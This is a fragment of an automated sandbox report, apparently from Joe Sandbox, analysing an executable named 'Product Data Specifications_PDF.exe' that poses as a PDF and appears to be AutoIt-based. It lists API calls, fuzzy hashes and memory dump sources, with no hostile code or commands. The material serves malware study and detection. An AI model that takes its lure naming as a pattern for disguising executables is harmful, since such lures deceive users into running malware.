                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcsncpy
                              • String ID: ^B$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 1735881322-159190787
                              • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                              • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                              • PostMessageW.USER32(00000000), ref: 00441C05
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D